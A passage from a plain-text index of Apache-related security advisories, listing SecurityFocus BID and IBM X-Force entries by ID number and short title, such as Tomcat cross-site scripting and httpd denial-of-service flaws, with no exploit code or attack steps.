6049| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
6050| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
6051| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
6052| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
6053| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
6054| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
6055| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
6056| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
6057| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6058| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
6059| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
6060| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
6061| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
6062| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
6063| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
6064| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
6065| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
6066| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
6067| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
6068| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
6069| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
6070| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
6071| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
6072| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
6073| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
6074| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
6075| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
6076| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
6077| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
6078| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
6079| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
6080| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
6081| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
6082| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
6083| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
6084| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
6085| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
6086| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
6087| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
6088| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
6089| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
6090| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
6091| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
6092| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
6093| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
6094| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
6095| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
6096| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
6097| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
6098| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
6099| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
6100| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
6101| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
6102| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
6103| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
6104| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
6105| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
6106| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
6107| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
6108| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
6109| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
6110| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
6111| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
6112| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
6113| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
6114| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
6115| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
6116| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
6117| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
6118| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
6119| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
6120| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
6121| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
6122| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
6123| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
6124| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
6125| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
6126| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
6127| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
6128| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
6129| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
6130| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
6131| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
6132| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
6133| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
6134| [20527] Apache Mod_TCL Remote Format String Vulnerability
6135| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
6136| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
6137| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
6138| [19106] Apache Tomcat Information Disclosure Vulnerability
6139| [18138] Apache James SMTP Denial Of Service Vulnerability
6140| [17342] Apache Struts Multiple Remote Vulnerabilities
6141| [17095] Apache Log4Net Denial Of Service Vulnerability
6142| [16916] Apache mod_python FileSession Code Execution Vulnerability
6143| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
6144| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
6145| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
6146| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
6147| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
6148| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
6149| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
6150| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
6151| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
6152| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
6153| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
6154| [15177] PHP Apache 2 Local Denial of Service Vulnerability
6155| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
6156| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
6157| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
6158| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
6159| [14106] Apache HTTP Request Smuggling Vulnerability
6160| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
6161| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
6162| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
6163| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
6164| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
6165| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
6166| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
6167| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
6168| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
6169| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
6170| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
6171| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
6172| [11471] Apache mod_include Local Buffer Overflow Vulnerability
6173| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
6174| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
6175| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
6176| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
6177| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
6178| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
6179| [11094] Apache mod_ssl Denial Of Service Vulnerability
6180| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
6181| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
6182| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
6183| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
6184| [10478] ClueCentral Apache Suexec Patch Security Weakness
6185| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
6186| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
6187| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
6188| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
6189| [9921] Apache Connection Blocking Denial Of Service Vulnerability
6190| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
6191| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
6192| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
6193| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
6194| [9733] Apache Cygwin Directory Traversal Vulnerability
6195| [9599] Apache mod_php Global Variables Information Disclosure Weakness
6196| [9590] Apache-SSL Client Certificate Forging Vulnerability
6197| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
6198| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
6199| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
6200| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
6201| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
6202| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
6203| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
6204| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
6205| [8898] Red Hat Apache Directory Index Default Configuration Error
6206| [8883] Apache Cocoon Directory Traversal Vulnerability
6207| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
6208| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
6209| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
6210| [8707] Apache htpasswd Password Entropy Weakness
6211| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
6212| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
6213| [8226] Apache HTTP Server Multiple Vulnerabilities
6214| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
6215| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
6216| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
6217| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
6218| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
6219| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
6220| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
6221| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
6222| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
6223| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
6224| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
6225| [7255] Apache Web Server File Descriptor Leakage Vulnerability
6226| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
6227| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
6228| [6939] Apache Web Server ETag Header Information Disclosure Weakness
6229| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
6230| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
6231| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
6232| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
6233| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
6234| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
6235| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
6236| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
6237| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
6238| [6117] Apache mod_php File Descriptor Leakage Vulnerability
6239| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
6240| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
6241| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
6242| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
6243| [5992] Apache HTDigest Insecure Temporary File Vulnerability
6244| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
6245| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
6246| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
6247| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
6248| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
6249| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
6250| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
6251| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
6252| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
6253| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
6254| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
6255| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
6256| [5485] Apache 2.0 Path Disclosure Vulnerability
6257| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
6258| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
6259| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
6260| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
6261| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
6262| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
6263| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
6264| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
6265| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
6266| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
6267| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
6268| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
6269| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
6270| [4437] Apache Error Message Cross-Site Scripting Vulnerability
6271| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
6272| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
6273| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
6274| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
6275| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
6276| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
6277| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
6278| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
6279| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
6280| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
6281| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
6282| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
6283| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
6284| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
6285| [3596] Apache Split-Logfile File Append Vulnerability
6286| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
6287| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
6288| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
6289| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
6290| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
6291| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
6292| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
6293| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
6294| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
6295| [3169] Apache Server Address Disclosure Vulnerability
6296| [3009] Apache Possible Directory Index Disclosure Vulnerability
6297| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
6298| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
6299| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
6300| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
6301| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
6302| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
6303| [2216] Apache Web Server DoS Vulnerability
6304| [2182] Apache /tmp File Race Vulnerability
6305| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
6306| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
6307| [1821] Apache mod_cookies Buffer Overflow Vulnerability
6308| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
6309| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
6310| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
6311| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
6312| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
6313| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
6314| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
6315| [1457] Apache::ASP source.asp Example Script Vulnerability
6316| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
6317| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
6318|
6319| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6320| [86258] Apache CloudStack text fields cross-site scripting
6321| [85983] Apache Subversion mod_dav_svn module denial of service
6322| [85875] Apache OFBiz UEL code execution
6323| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
6324| [85871] Apache HTTP Server mod_session_dbd unspecified
6325| [85756] Apache Struts OGNL expression command execution
6326| [85755] Apache Struts DefaultActionMapper class open redirect
6327| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
6328| [85574] Apache HTTP Server mod_dav denial of service
6329| [85573] Apache Struts Showcase App OGNL code execution
6330| [85496] Apache CXF denial of service
6331| [85423] Apache Geronimo RMI classloader code execution
6332| [85326] Apache Santuario XML Security for C++ buffer overflow
6333| [85323] Apache Santuario XML Security for Java spoofing
6334| [85319] Apache Qpid Python client SSL spoofing
6335| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
6336| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
6337| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
6338| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
6339| [84952] Apache Tomcat CVE-2012-3544 denial of service
6340| [84763] Apache Struts CVE-2013-2135 security bypass
6341| [84762] Apache Struts CVE-2013-2134 security bypass
6342| [84719] Apache Subversion CVE-2013-2088 command execution
6343| [84718] Apache Subversion CVE-2013-2112 denial of service
6344| [84717] Apache Subversion CVE-2013-1968 denial of service
6345| [84577] Apache Tomcat security bypass
6346| [84576] Apache Tomcat symlink
6347| [84543] Apache Struts CVE-2013-2115 security bypass
6348| [84542] Apache Struts CVE-2013-1966 security bypass
6349| [84154] Apache Tomcat session hijacking
6350| [84144] Apache Tomcat denial of service
6351| [84143] Apache Tomcat information disclosure
6352| [84111] Apache HTTP Server command execution
6353| [84043] Apache Virtual Computing Lab cross-site scripting
6354| [84042] Apache Virtual Computing Lab cross-site scripting
6355| [83782] Apache CloudStack information disclosure
6356| [83781] Apache CloudStack security bypass
6357| [83720] Apache ActiveMQ cross-site scripting
6358| [83719] Apache ActiveMQ denial of service
6359| [83718] Apache ActiveMQ denial of service
6360| [83263] Apache Subversion denial of service
6361| [83262] Apache Subversion denial of service
6362| [83261] Apache Subversion denial of service
6363| [83259] Apache Subversion denial of service
6364| [83035] Apache mod_ruid2 security bypass
6365| [82852] Apache Qpid federation_tag security bypass
6366| [82851] Apache Qpid qpid::framing::Buffer denial of service
6367| [82758] Apache Rave User RPC API information disclosure
6368| [82663] Apache Subversion svn_fs_file_length() denial of service
6369| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
6370| [82641] Apache Qpid AMQP denial of service
6371| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
6372| [82618] Apache Commons FileUpload symlink
6373| [82360] Apache HTTP Server manager interface cross-site scripting
6374| [82359] Apache HTTP Server hostnames cross-site scripting
6375| [82338] Apache Tomcat log/logdir information disclosure
6376| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
6377| [82268] Apache OpenJPA deserialization command execution
6378| [81981] Apache CXF UsernameTokens security bypass
6379| [81980] Apache CXF WS-Security security bypass
6380| [81398] Apache OFBiz cross-site scripting
6381| [81240] Apache CouchDB directory traversal
6382| [81226] Apache CouchDB JSONP code execution
6383| [81225] Apache CouchDB Futon user interface cross-site scripting
6384| [81211] Apache Axis2/C SSL spoofing
6385| [81167] Apache CloudStack DeployVM information disclosure
6386| [81166] Apache CloudStack AddHost API information disclosure
6387| [81165] Apache CloudStack createSSHKeyPair API information disclosure
6388| [80518] Apache Tomcat cross-site request forgery security bypass
6389| [80517] Apache Tomcat FormAuthenticator security bypass
6390| [80516] Apache Tomcat NIO denial of service
6391| [80408] Apache Tomcat replay-countermeasure security bypass
6392| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
6393| [80317] Apache Tomcat slowloris denial of service
6394| [79984] Apache Commons HttpClient SSL spoofing
6395| [79983] Apache CXF SSL spoofing
6396| [79830] Apache Axis2/Java SSL spoofing
6397| [79829] Apache Axis SSL spoofing
6398| [79809] Apache Tomcat DIGEST security bypass
6399| [79806] Apache Tomcat parseHeaders() denial of service
6400| [79540] Apache OFBiz unspecified
6401| [79487] Apache Axis2 SAML security bypass
6402| [79212] Apache Cloudstack code execution
6403| [78734] Apache CXF SOAP Action security bypass
6404| [78730] Apache Qpid broker denial of service
6405| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
6406| [78563] Apache mod_pagespeed module unspecified cross-site scripting
6407| [78562] Apache mod_pagespeed module security bypass
6408| [78454] Apache Axis2 security bypass
6409| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
6410| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
6411| [78321] Apache Wicket unspecified cross-site scripting
6412| [78183] Apache Struts parameters denial of service
6413| [78182] Apache Struts cross-site request forgery
6414| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
6415| [77987] mod_rpaf module for Apache denial of service
6416| [77958] Apache Struts skill name code execution
6417| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
6418| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
6419| [77568] Apache Qpid broker security bypass
6420| [77421] Apache Libcloud spoofing
6421| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
6422| [77046] Oracle Solaris Apache HTTP Server information disclosure
6423| [76837] Apache Hadoop information disclosure
6424| [76802] Apache Sling CopyFrom denial of service
6425| [76692] Apache Hadoop symlink
6426| [76535] Apache Roller console cross-site request forgery
6427| [76534] Apache Roller weblog cross-site scripting
6428| [76152] Apache CXF elements security bypass
6429| [76151] Apache CXF child policies security bypass
6430| [75983] MapServer for Windows Apache file include
6431| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
6432| [75558] Apache POI denial of service
6433| [75545] PHP apache_request_headers() buffer overflow
6434| [75302] Apache Qpid SASL security bypass
6435| [75211] Debian GNU/Linux apache 2 cross-site scripting
6436| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
6437| [74871] Apache OFBiz FlexibleStringExpander code execution
6438| [74870] Apache OFBiz multiple cross-site scripting
6439| [74750] Apache Hadoop unspecified spoofing
6440| [74319] Apache Struts XSLTResult.java file upload
6441| [74313] Apache Traffic Server header buffer overflow
6442| [74276] Apache Wicket directory traversal
6443| [74273] Apache Wicket unspecified cross-site scripting
6444| [74181] Apache HTTP Server mod_fcgid module denial of service
6445| [73690] Apache Struts OGNL code execution
6446| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
6447| [73100] Apache MyFaces in directory traversal
6448| [73096] Apache APR hash denial of service
6449| [73052] Apache Struts name cross-site scripting
6450| [73030] Apache CXF UsernameToken security bypass
6451| [72888] Apache Struts lastName cross-site scripting
6452| [72758] Apache HTTP Server httpOnly information disclosure
| [72757] Apache HTTP Server MPM denial of service
| [72585] Apache Struts ParameterInterceptor security bypass
| [72438] Apache Tomcat Digest security bypass
| [72437] Apache Tomcat Digest security bypass
| [72436] Apache Tomcat DIGEST security bypass
| [72425] Apache Tomcat parameter denial of service
| [72422] Apache Tomcat request object information disclosure
| [72377] Apache HTTP Server scoreboard security bypass
| [72345] Apache HTTP Server HTTP request denial of service
| [72229] Apache Struts ExceptionDelegator command execution
| [72089] Apache Struts ParameterInterceptor directory traversal
| [72088] Apache Struts CookieInterceptor command execution
| [72047] Apache Geronimo hash denial of service
| [72016] Apache Tomcat hash denial of service
| [71711] Apache Struts OGNL expression code execution
| [71654] Apache Struts interfaces security bypass
| [71620] Apache ActiveMQ failover denial of service
| [71617] Apache HTTP Server mod_proxy module information disclosure
| [71508] Apache MyFaces EL security bypass
| [71445] Apache HTTP Server mod_proxy security bypass
| [71203] Apache Tomcat servlets privilege escalation
| [71181] Apache HTTP Server ap_pregsub() denial of service
| [71093] Apache HTTP Server ap_pregsub() buffer overflow
| [70336] Apache HTTP Server mod_proxy information disclosure
| [69804] Apache HTTP Server mod_proxy_ajp denial of service
| [69472] Apache Tomcat AJP security bypass
| [69396] Apache HTTP Server ByteRange filter denial of service
| [69394] Apache Wicket multi window support cross-site scripting
| [69176] Apache Tomcat XML information disclosure
| [69161] Apache Tomcat jsvc information disclosure
| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
| [68541] Apache Tomcat sendfile information disclosure
| [68420] Apache XML Security denial of service
| [68238] Apache Tomcat JMX information disclosure
| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
| [67804] Apache Subversion control rules information disclosure
| [67803] Apache Subversion control rules denial of service
| [67802] Apache Subversion baselined denial of service
| [67672] Apache Archiva multiple cross-site scripting
| [67671] Apache Archiva multiple cross-site request forgery
| [67564] Apache APR apr_fnmatch() denial of service
| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
| [67515] Apache Tomcat annotations security bypass
| [67480] Apache Struts s:submit information disclosure
| [67414] Apache APR apr_fnmatch() denial of service
| [67356] Apache Struts javatemplates cross-site scripting
| [67354] Apache Struts Xwork cross-site scripting
| [66676] Apache Tomcat HTTP BIO information disclosure
| [66675] Apache Tomcat web.xml security bypass
| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
| [66241] Apache HttpComponents information disclosure
| [66154] Apache Tomcat ServletSecurity security bypass
| [65971] Apache Tomcat ServletSecurity security bypass
| [65876] Apache Subversion mod_dav_svn denial of service
| [65343] Apache Continuum unspecified cross-site scripting
| [65162] Apache Tomcat NIO connector denial of service
| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
| [65160] Apache Tomcat HTML Manager interface cross-site scripting
| [65159] Apache Tomcat ServletContect security bypass
| [65050] Apache CouchDB web-based administration UI cross-site scripting
| [64773] Oracle HTTP Server Apache Plugin unauthorized access
